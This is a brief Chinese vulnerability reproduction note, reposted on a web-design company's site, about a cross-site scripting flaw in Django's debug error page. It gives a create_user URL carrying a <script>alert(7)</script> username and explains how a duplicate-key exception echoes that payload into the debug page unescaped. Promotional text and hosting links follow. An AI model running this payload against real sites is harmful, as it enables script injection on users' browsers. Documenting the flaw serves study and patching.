DjangodebugpageXSS漏洞(CVE-20
漏洞复现:
1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>
显示用户已创建。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>
3.触发异常:duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。
创新互联公司致力于互联网品牌建设与网络营销,包括网站设计、网站建设、SEO优化、网络推广、整站优化营销策划推广、电子商务、移动互联网营销等。创新互联公司为不同类型的客户提供良好的互联网应用定制及解决方案,创新互联公司核心团队10年专注互联网开发,积累了丰富的网站经验,为广大企业客户提供一站式企业网站建设服务,在网站建设行业内树立了良好口碑。
新闻标题:DjangodebugpageXSS漏洞(CVE-20
文章起源:https://www.cdcxhl.com/article2/joseic.html
成都网站建设公司_创新互联,为您提供面包屑导航、服务器托管、网站导航、网站营销、Google、电子商务
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
- 虚拟主机空间流量为什么会有限制? 2016-11-07
- 再谈虚拟主机和域名的选购技巧 2021-06-27
- 企业网站如何选择虚拟主机、如何选择网站空间? 2021-06-01
- 购买服务器与虚拟主机的优缺点 2015-11-26
- 服务器租用和虚拟主机的有什么区别 2016-10-13
- 虚拟主机适合我的网站吗? 2022-07-22
- 企业建网站选购虚拟主机的五个关键 2022-04-29
- 虚拟主机什么时候要升级为云主机? 2022-10-04
- 自己做网站 虚拟主机选择一定不能忽视 2016-11-16
- 服务器之家浅谈虚拟主机与云服务器的区别在哪里? 2022-10-11
- 哪的虚拟主机好? 2022-07-20
- 独立IP虚拟主机有哪些优势和劣势? 2021-02-05